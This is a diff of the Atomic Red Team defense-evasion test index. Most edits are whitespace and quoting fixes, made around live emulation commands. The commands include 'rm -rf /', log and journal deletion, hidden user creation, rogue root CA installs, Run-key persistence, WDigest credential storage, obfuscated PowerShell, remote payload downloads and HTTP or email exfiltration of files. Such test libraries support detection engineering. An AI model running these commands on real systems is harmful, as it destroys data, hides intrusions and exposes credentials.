@@ -25074,17 +25074,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null - ' +' executor: command: 'Remove-Item -path #{file_to_delete} - ' +' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
@@ -25092,7 +25092,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - ' +' supported_platforms: - windows input_arguments:
@@ -25106,18 +25106,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null - ' +' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse - ' +' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
@@ -25125,13 +25125,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -25144,7 +25144,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' name: powershell elevation_required: true - name: Delete TeamViewer Log Files
@@ -25168,18 +25168,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) - ' +' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null - ' +' executor: command: 'Remove-Item #{teamviewer_log_file} - ' +' name: powershell T1222: technique:
@@ -25324,7 +25324,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments:
@@ -25335,7 +25335,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} - ' +' elevation_required: true name: sh T1484.001:
@@ -25563,7 +25563,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos
@@ -25573,20 +25573,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
@@ -25604,20 +25604,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +s #{file_to_modify} - ' +' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib
@@ -25636,27 +25636,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +h #{file_to_modify} - ' +' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments:
@@ -25667,13 +25667,13 @@ defense-evasion: executor: command: 'setfile -a V #(unknown) - ' +' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor:
@@ -25682,22 +25682,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt - ' +' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' name: sh T1564.002: technique:
@@ -25745,7 +25745,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) - ' +' supported_platforms: - macos input_arguments:
@@ -25756,17 +25756,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin - ' +' supported_platforms: - macos input_arguments:
@@ -25777,10 +25777,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh T1564.003:
@@ -25862,7 +25862,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} - ' +' name: powershell T1564: technique:
@@ -25946,7 +25946,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null
@@ -25956,7 +25956,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
@@ -25966,7 +25966,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore - ' +' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
@@ -26141,7 +26141,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos
@@ -26307,7 +26307,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files - ' +' supported_platforms: - linux input_arguments:
@@ -26342,7 +26342,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. - ' +' supported_platforms: - linux input_arguments:
@@ -26487,10 +26487,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: - ' +' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: - ' +' name: command_prompt elevation_required: true T1202:
@@ -26604,7 +26604,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" - ' +' name: command_prompt T1553.004: technique:
@@ -26704,7 +26704,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments:
@@ -26733,7 +26733,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments:
@@ -26749,10 +26749,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -26766,7 +26766,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl - ' +' supported_platforms: - macos input_arguments:
@@ -26782,10 +26782,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -26793,14 +26793,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - ' +' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell - ' +' supported_platforms: - windows input_arguments:
@@ -26812,10 +26812,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -26839,7 +26839,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil - ' +' supported_platforms: - windows input_arguments:
@@ -26851,10 +26851,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -26862,7 +26862,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} - ' +' cleanup_command: | $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
@@ -26949,10 +26949,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27017,10 +27017,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27063,7 +27063,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments:
@@ -27088,10 +27088,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27134,7 +27134,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments:
@@ -27159,10 +27159,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27205,7 +27205,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments:
@@ -27230,10 +27230,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27277,7 +27277,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments:
@@ -27302,10 +27302,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27348,7 +27348,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. - ' +' supported_platforms: - windows input_arguments:
@@ -27373,10 +27373,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27430,10 +27430,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27615,7 +27615,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux
@@ -27631,14 +27631,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux
@@ -27654,14 +27654,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux
@@ -27677,14 +27677,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux
@@ -27700,14 +27700,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux
@@ -27727,14 +27727,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux
@@ -27754,13 +27754,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux
@@ -27776,13 +27776,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux
@@ -27798,7 +27798,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} - ' +' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
@@ -27816,7 +27816,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} - ' +' name: sh T1078.003: technique:
@@ -27940,7 +27940,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. - ' +' supported_platforms: - windows input_arguments:
@@ -27960,10 +27960,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#(unknown)"
@@ -27976,7 +27976,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. - ' +' supported_platforms: - windows input_arguments:
@@ -27996,10 +27996,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#(unknown)"
@@ -28122,7 +28122,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - ' +' supported_platforms: - windows input_arguments:
@@ -28134,20 +28134,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" - ' +' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null - ' +' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
@@ -28169,10 +28169,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
@@ -28259,7 +28259,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f - ' +' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc
@@ -28274,7 +28274,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times - ' +' name: command_prompt elevation_required: true T1036:
@@ -28424,7 +28424,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) - ' +' supported_platforms: - macos - linux
@@ -28673,11 +28673,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd
@@ -28697,11 +28697,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials
@@ -28716,11 +28716,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone
@@ -28761,11 +28761,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" - ' +' name: command_prompt T1218.007: technique:
@@ -29267,7 +29267,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments:
@@ -29279,17 +29279,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) - ' +' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own MSI" - ' +' executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649
@@ -29297,7 +29297,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments:
@@ -29308,7 +29308,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
@@ -29327,17 +29327,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" - ' +' name: command_prompt T1564.004: technique:
@@ -29477,7 +29477,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore - ' +' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb
@@ -29501,7 +29501,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
@@ -29523,13 +29523,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null - ' +' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
@@ -29537,7 +29537,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' name: powershell T1599.001: technique:
@@ -29746,7 +29746,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments:
@@ -29763,7 +29763,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments:
@@ -29774,13 +29774,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete - ' +' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments:
@@ -29990,14 +29990,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} - ' +' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. - ' +' supported_platforms: - windows input_arguments: @@ -30009,11 +30009,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe - ' +' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -30021,7 +30021,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" - ' +' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -30055,7 +30055,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -30076,7 +30076,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} - ' +' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f @@ -30084,7 +30084,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows executor: 
@@ -30095,7 +30095,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) - ' +' name: powershell T1218.008: technique: @@ -30166,7 +30166,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. - ' +' supported_platforms: - windows input_arguments: @@ -30178,17 +30178,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} - ' +' name: command_prompt T1134.004: technique: @@ -30301,10 +30301,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location 